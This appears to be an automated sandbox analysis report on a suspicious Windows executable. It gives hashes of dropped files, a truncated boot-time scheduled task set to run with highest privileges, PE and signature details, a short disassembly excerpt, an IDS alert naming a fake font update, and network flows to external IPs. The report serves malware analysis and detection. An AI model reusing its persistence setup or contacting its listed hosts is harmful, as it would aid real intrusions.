                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Users\user\Desktop\sE5IdDeTp2.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1512
                                    Entropy (8bit):5.139302350214515
                                    Encrypted:false
                                    SSDEEP:24:2dk4+SkIMFWYL60YeGlMhEMjn5pwjpILUYODOLqx49RJh7h8gJ15E15LNEBwcLYt:cC3IQDL60uydbQ9IIYODOLqOdq2sbEW7
                                    MD5:D99791DECBB48A340B6C63C225B3EFDC
                                    SHA1:0C2D9A362D0C6A33C2CCA6684366A8BB1158DCC0
                                    SHA-256:16037148C9AF0EFFA3F91960EB4F60F9E09F14585ACB6089FDCCDF64E68BD804
                                    SHA-512:B7B165C352B42354F35C449B4EF9A4C215914FD5023216549204F16FF3281FB3FD0077E3B9585FFFDF25F2FA5CD78910E6298D3F1E9944C835F7CCBC9893EFB9
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <Triggers>.. <BootTrigger>.. . <Enabled>true</Enabled>.. </BootTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">... <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <Duration>PT10M</Duration>.. <WaitTimeout>PT1H</WaitTimeout>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabl
                                    Process:C:\Windows\System32\conhost.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):1512
                                    Entropy (8bit):6.147836345315121
                                    Encrypted:false
                                    SSDEEP:24:Rk7mUqmzyRhRYPs2wvDndrjqQ6SZDulLAXpnSyBQhJR1PDRqC0I6NaKko5MheEgP:KrhzybOPs2wRqPSDpntWRNqCqtko5QuP
                                    MD5:DD3F4970B2B5945ED3E4E85B5FEFCB9A
                                    SHA1:6C313B3A004E55894C33A628D1FE1BA3F1B8DC76
                                    SHA-256:BC7D16248A343B19516690B483CA909130D44CC3C72FE2E239C03E85664A7CC4
                                    SHA-512:9E6C2655D7ADB81B92D5624833AECCA71B0CF17251F6E237034B7904BA4D50E65BCD471BECEF0C9324FDF276D90EE59C9D012CDE6E54D71663248265BE128380
                                    Malicious:false
                                    Preview:jce.vuyz.czy.brj.jgwhioxn.A.[hu{..ehu.ywb.zydbrirjgwhi..m..pkhu.jcehvv.wlcz.dbrf.i.w.ilxh.wpQhuv.=e.{uywl..yg..h.^gx.j.xmkwpkhv.{`.U..yt.czy]brirgg.hio(.kwpkhuvjcehvuyw.czykbriH.7@.iV{.kwpk.uvjce.vLz..cz9.be..]f.oilxmow.T.tf\cehvuywlc.ydbrirjgwhio(Wkwp..uvjcei.uyClg.y...f.jgw..l{.kwpS..Ojne.vu.w[bZy.brirjgwh..Gn.wpkhuv]ceh.u.wlczydbri..S.hi.xm.Wph..vjYehKuywll.yd]rk2jgwhilxmk.pkhuv.cehvuywlczy.f2irjgw.j.x.kw.khuy.ceV.uywb.zy].rR..g.hilxUh.p..uvjcei.uy@lnz.db.ixjgw...xh..pkhztjcek.u.t.czadbrirUgwTilxmewpkh.y.ck..uyt.czydc.\q>g.hilxmh:...uvo..e.uyw.l.yk.rf.i*...lxmkwpQk.vjne..uz.lcu..br.|8gwRilxn..pkhv.\cj.uDwlc..dbr].jg.hio'.kwpkhuu..ei.uzwo.z.db.i~.gBhd.{.kt.khzwjce.vuywWcu.f.irRgwhicxmfwpkhuvjck..uywlczy^brirjgw(i.w.kwph..vjYehKuywll.yk.riNjgw.ilxmkwq+.x@jce.vuy.l.ZNg.ri}.gwoiax.owpkfuu.ehvuywlc.yd.p.rjgw(i.xmkwu..u.n.ehKuywlcEydbq9rjf7..lxmkwpk.uv.l.xAz'lczLdbrirS.wh.b.mow..hv.j.k....wlczydbrUrjp.hio([kw..huvjcehvuywlcz.dbrirjgwhl.{.kt..huNi3e.{uyy.czL.be..]f.hilxmkw..hux.buh.{..
                                    File type:PE32+ executable (GUI) x86-64, for MS Windows
                                    Entropy (8bit):6.811982830856188
                                    TrID:
                                    • Win64 Executable GUI (202006/5) 92.65%
                                    • Win64 Executable (generic) (12005/4) 5.51%
                                    • Generic Win/DOS Executable (2004/3) 0.92%
                                    • DOS Executable Generic (2002/1) 0.92%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:sE5IdDeTp2.exe
                                    File size:1'245'320 bytes
                                    MD5:dd36f6f79e68d5e54c75527db2da97ad
                                    SHA1:a373e613510ada66cea74ffc590c25edc59957ac
                                    SHA256:3030ba393865e41fee490205bf5873b4041275a8830d5e764693771fec2bd35e
                                    SHA512:e1f9e1c8d246fd381d5af12c87940df54df9f6877bff58abdea7a8d533a31a675b553d7e5bb134bb64576de53a3c72c4e8a3e624a639c13dfa918f2a4a638fd1
                                    SSDEEP:12288:2iQnVXYD4TNwzBcgXn0dE/xmiNrP64F78O9PpctLMbl0UVh4OsYX0bLDHOM5p:KNw1iS/EiNb64F78yPd+WDsYX0bLzOCp
                                    TLSH:2C45E093B06D20E9CC3BF03CA619A232E767B8A4175150CB59712A326B5BCD45FF893D
                                    File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...X..g.........."......~...V......@..........@.............................P............`........................................
                                    Icon Hash:90cececece8e8eb0
                                    Entrypoint:0x140001140
                                    Entrypoint Section:.text
                                    Digitally signed:true
                                    Imagebase:0x140000000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x6782E258 [Sat Jan 11 21:27:52 2025 UTC]
                                    TLS Callbacks:0x400022f0, 0x1, 0x40002370, 0x1
                                    CLR (.Net) Version:
                                    OS Version Major:6
                                    OS Version Minor:0
                                    File Version Major:6
                                    File Version Minor:0
                                    Subsystem Version Major:6
                                    Subsystem Version Minor:0
                                    Import Hash:25b2e2929328699a3b459a68f5fdc7fb
                                    Signature Valid:false
                                    Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                    Signature Validation Error:The digital signature of the object did not verify
                                    Error Number:-2146869232
                                    Not Before, Not After
                                    • 19/08/2021 01:00:00 20/08/2023 00:59:59
                                    Subject Chain
                                    • CN="Oracle America, Inc.", OU=Software Engineering, O="Oracle America, Inc.", L=Redwood City, S=California, C=US
                                    Version:3
                                    Thumbprint MD5:2876C1BECB51837D0E3DE50903D025B6
                                    Thumbprint SHA-1:940D69C0A34A1B4CFD8048488BA86F4CED60481A
                                    Thumbprint SHA-256:EE46613A38B4F486164BCE7FB23178667715617F511B364594311A1548B08EB1
                                    Serial:068BE2F53452C882F18ED41A5DD4E7A3
                                    Instruction
                                    dec eax
                                    sub esp, 28h
                                    dec eax
                                    mov eax, dword ptr [00027ED5h]
                                    mov dword ptr [eax], 00000001h
                                    call 00007F6844E5656Fh
                                    nop
                                    nop
                                    nop
                                    dec eax
                                    add esp, 28h
                                    ret
                                    nop
                                    inc ecx
                                    push edi
                                    inc ecx
                                    push esi
                                    push esi
                                    push edi
                                    push ebx
                                    dec eax
                                    sub esp, 20h
                                    dec eax
                                    mov eax, dword ptr [00000030h]
                                    dec eax
                                    mov edi, dword ptr [eax+08h]
                                    dec eax
                                    mov esi, dword ptr [00027EC9h]
                                    xor eax, eax
                                    dec eax
                                    cmpxchg dword ptr [esi], edi
                                    sete bl
                                    je 00007F6844E56590h
                                    dec eax
                                    cmp edi, eax
                                    je 00007F6844E5658Bh
                                    dec esp
                                    mov esi, dword ptr [0002F361h]
                                    nop word ptr [eax+eax+00000000h]
                                    mov ecx, 000003E8h
                                    inc ecx
                                    call esi
                                    xor eax, eax
                                    dec eax
                                    cmpxchg dword ptr [esi], edi
                                    sete bl
                                    je 00007F6844E56567h
                                    dec eax
                                    cmp edi, eax
                                    jne 00007F6844E56549h
                                    dec eax
                                    mov edi, dword ptr [00027E90h]
                                    mov eax, dword ptr [edi]
                                    cmp eax, 01h
                                    jne 00007F6844E5656Eh
                                    mov ecx, 0000001Fh
                                    call 00007F6844E7DEA4h
                                    jmp 00007F6844E56589h
                                    cmp dword ptr [edi], 00000000h
                                    je 00007F6844E5656Bh
                                    mov byte ptr [0012BA59h], 00000001h
                                    jmp 00007F6844E5657Bh
                                    mov dword ptr [edi], 00000001h
                                    dec eax
                                    mov ecx, dword ptr [00027E7Ah]
                                    dec eax
                                    mov edx, dword ptr [00027E7Bh]
                                    call 00007F6844E7DE9Bh
                                    mov eax, dword ptr [edi]
                                    cmp eax, 01h
                                    jne 00007F6844E5657Bh
                                    dec eax
                                    mov ecx, dword ptr [00027E50h]
                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x2ff980x3c.rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1330000x340.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x12f0000x114c.pdata
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x12d8000x2888
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1340000x9b8.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x292f00x28.rdata
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2f1e80x138.rdata
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x302800x2a8.rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x10000x27de60x27e00a99fe9d1965160ddc69106030cc4b61dFalse0.4477615595611285data6.386085069656227IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rdata0x290000x92300x9400ec8b47ba5791ba2867ca49c3a5de31e5False0.2924936655405405data5.430027447616626IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data0x330000xfb0e50xf9e0001fbf7309ccb3c49ca64f155cddd2cc8False0.6647239635442721data6.457361653180868IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .pdata0x12f0000x114c0x1200370eced07dff8d002397577b7f3ea16aFalse0.5180121527777778data5.213112045030989IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .00cfg0x1310000x100x200fc74edd4cfadbf37e115bea8cdba7fcbFalse0.041015625data0.13091701814887827IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .tls0x1320000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc0x1330000x3400x40001bd31ff039a2ba3032b09c68396f09aFalse0.37109375data2.789871934356042IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0x1340000x9b80xa0074b3e8078809c63acec5e8ae3c7f631eFalse0.48203125data5.415805110669786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_VERSION0x1330600x2e0dataEnglishUnited States0.46875
                                    DLLImport
                                    msvcrt.dll__C_specific_handler, ___lc_codepage_func, ___mb_cur_max_func, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _aligned_free, _aligned_malloc, _amsg_exit, _assert, _cexit, _commode, _errno, _fmode, _initterm, _localtime64, _lock, _onexit, _time64, _unlock, _wcsicmp, _wcsnicmp, abort, calloc, exit, fflush, fprintf, fputc, fputwc, free, fwprintf, fwrite, getenv, isxdigit, localeconv, malloc, memchr, memcmp, memcpy, memmove, memset, realloc, signal, strcmp, strerror, strlen, strncmp, vfprintf, wcscat, wcscpy, wcsftime, wcslen, wcsncmp
                                    KERNEL32.dllAcquireSRWLockExclusive, DeleteCriticalSection, EnterCriticalSection, FlsAlloc, FlsGetValue, FlsSetValue, GetLastError, GetModuleHandleW, GetProcAddress, GetSystemTimeAsFileTime, InitOnceExecuteOnce, InitializeCriticalSection, IsDBCSLeadByteEx, LeaveCriticalSection, MultiByteToWideChar, RaiseException, ReleaseSRWLockExclusive, RtlCaptureContext, RtlLookupFunctionEntry, RtlRestoreContext, RtlUnwindEx, RtlVirtualUnwind, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery, WideCharToMultiByte
                                    Language of compilation systemCountry where language is spokenMap
                                    EnglishUnited States
                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                    2025-01-12T17:38:28.464034+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449731173.244.207.29443TCP
                                    TimestampSource PortDest PortSource IPDest IP
                                    Jan 12, 2025 17:38:27.806127071 CET49731443192.168.2.4173.244.207.29
                                    Jan 12, 2025 17:38:27.806174040 CET44349731173.244.207.29192.168.2.4
                                    Jan 12, 2025 17:38:27.806250095 CET49731443192.168.2.4173.244.207.29
                                    Jan 12, 2025 17:38:27.807934046 CET49731443192.168.2.4173.244.207.29
                                    Jan 12, 2025 17:38:27.807954073 CET44349731173.244.207.29192.168.2.4
                                    Jan 12, 2025 17:38:28.463948011 CET44349731173.244.207.29192.168.2.4
                                    Jan 12, 2025 17:38:28.464034081 CET49731443192.168.2.4173.244.207.29
                                    Jan 12, 2025 17:38:28.465034008 CET44349731173.244.207.29192.168.2.4
                                    Jan 12, 2025 17:38:28.465104103 CET49731443192.168.2.4173.244.207.29
                                    Jan 12, 2025 17:38:28.468867064 CET49731443192.168.2.4173.244.207.29
                                    Jan 12, 2025 17:38:28.468873978 CET44349731173.244.207.29192.168.2.4
                                    Jan 12, 2025 17:38:28.469122887 CET44349731173.244.207.29192.168.2.4
                                    Jan 12, 2025 17:38:28.516145945 CET49731443192.168.2.4173.244.207.29
                                    Jan 12, 2025 17:38:28.516179085 CET49731443192.168.2.4173.244.207.29
                                    Jan 12, 2025 17:38:28.516282082 CET44349731173.244.207.29192.168.2.4
                                    Jan 12, 2025 17:38:28.767560005 CET44349731173.244.207.29192.168.2.4
                                    Jan 12, 2025 17:38:28.767633915 CET44349731173.244.207.29192.168.2.4
                                    Jan 12, 2025 17:38:28.767864943 CET49731443192.168.2.4173.244.207.29
                                    Jan 12, 2025 17:38:28.767960072 CET49731443192.168.2.4173.244.207.29
                                    Jan 12, 2025 17:38:28.767960072 CET49731443192.168.2.4173.244.207.29
                                    Jan 12, 2025 17:38:28.767976046 CET44349731173.244.207.29192.168.2.4
                                    Jan 12, 2025 17:38:28.767986059 CET44349731173.244.207.29192.168.2.4
                                    Jan 12, 2025 17:38:29.311034918 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:38:29.315896988 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:38:29.315969944 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:38:29.316138983 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:38:29.316138983 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:38:29.320987940 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:38:29.320997953 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:38:29.996419907 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:38:30.049283028 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:38:33.177155018 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:38:33.177155018 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:38:33.182037115 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:38:33.182050943 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:38:33.393832922 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:38:33.439902067 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:38:37.019069910 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:38:37.019179106 CET4973280192.168.2.4193.233.113.77
                                    Jan 12, 2025 17:38:37.024023056 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:38:37.024029016 CET8049732193.233.113.77192.168.2.4
                                    Jan 12, 2025 17:38:37.233493090 CET8049732193.233.113.77192.168.2.4
